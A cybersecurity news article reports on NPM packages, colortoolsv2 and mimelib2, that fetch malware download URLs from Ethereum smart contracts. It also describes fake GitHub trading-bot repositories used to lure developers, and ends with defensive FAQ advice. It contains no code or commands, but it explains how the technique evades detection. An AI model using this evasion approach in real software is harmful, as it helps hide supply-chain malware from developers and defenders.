New Ethereum Smart Contract Malware Discovered

Key Takeaways

• Ethereum smart contracts are being used to hide malicious URLs, making them harder to detect.

• The malware packages (colortoolsv2 and mimelib2) were hosted on NPM and appeared legitimate.

• Blockchain traffic is trusted, so security systems often overlook it.

• Fake GitHub repositories were used in a coordinated social engineering campaign.

• This trend marks a shift in malware tactics targeting Web3 infrastructure and open-source software.

How Ethereum Smart Contracts Are Being Exploited

Malicious NPM Packages Uncovered

ReversingLabs researchers revealed that two NPM packages, colortoolsv2 and mimelib2, published in July 2024, were designed to use Ethereum smart contracts to hide and retrieve URLs associated with malware payloads.

NPM packages ‘colortoolsv2’ & ‘mimelib2’ On GitHub

Source: ReversingLabs

Instead of embedding malicious URLs directly into the packages, the malware fetched command-and-control (C2) server addresses from Ethereum smart contracts, making detection by conventional security tools significantly more difficult.

Why This Technique Works

Because interactions with the Ethereum blockchain are considered legitimate network traffic, querying smart contracts to obtain malware download URLs can go unnoticed by traditional intrusion detection systems.

Once installed, the malicious packages acted as lightweight downloaders, initiating communication with the blockchain to retrieve hidden instructions.

ReversingLabs researcher Lucija Valentić said:

“What is new and different is the use of Ethereum smart contracts to host the URLs where malicious commands are located.”

Social Engineering Meets Blockchain

GitHub Repositories As Deceptive Fronts

These malware packages weren’t isolated threats, they were part of a larger deception campaign. Hackers set up fake GitHub repositories that mimicked legitimate cryptocurrency trading bots.

Tactics used to build trust included:

• Fabricated code commits

• Fake user accounts to simulate popularity

• Multiple maintainer profiles

• Professional-looking documentation

These repositories lured developers into downloading and integrating malicious packages into their projects, unknowingly exposing themselves to malware.

Trolling The Open Source Community

This attack strategy reveals a troubling trend: open-source repositories are becoming attack surfaces.

As developers increasingly rely on packages from NPM, GitHub, and other open repositories, threat actors are embedding themselves in the supply chain.

Not The First, But Definitely The Most Sophisticated

Previous Blockchain Malware Incidents

Ethereum smart contract malware isn’t entirely new. The infamous Lazarus Group, believed to be linked to North Korea, used similar techniques earlier in 2024.

However, this latest approach introduces a new level of stealth and complexity.

Other blockchain ecosystems have also been targeted:

• Solana: A fake GitHub repository posed as a Solana trading bot and delivered obfuscated malware to steal wallet credentials.

• Bitcoinlib: A legitimate Python library used by Bitcoin developers was exploited to inject credential-stealing code.

The Now Deleted Fake GitHub Repository

Source: SlowMist

A Growing Threat To Web3 Security

In 2024 alone, researchers have documented over 23 malicious campaigns targeting crypto-related open-source repositories. This new use of Ethereum smart contract malware shows that attackers are continuously refining their tactics.

Traditional malware detection often assumes that malicious URLs will be hardcoded or fetched from known domains. But by offloading these URLs to the Ethereum blockchain, hackers bypass both static and dynamic analysis.

Valentić warned:

“It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”

FAQ

What is Ethereum smart contract malware?

Ethereum smart contract malware refers to malicious code or instructions hidden within smart contracts on the Ethereum blockchain, often used to evade detection by traditional cybersecurity tools.

How did the attackers use Ethereum smart contracts in this case?

The attackers embedded URLs inside smart contracts. The infected NPM packages queried the blockchain to fetch these URLs, which were then used to download the actual malware.

Why is this technique effective?

Because blockchain interactions appear legitimate and are often encrypted, they bypass many traditional malware detection methods, including firewalls and URL filtering.

What can developers do to protect themselves?

• Use package auditing tools like Snyk or npm audit

• Verify the credibility of GitHub repositories before use

• Monitor outbound traffic to block unusual blockchain queries

• Keep security software up to date

Is this only happening on Ethereum?

No. Similar tactics have been observed on other blockchains like Solana and Bitcoin, indicating a broader trend across the crypto ecosystem.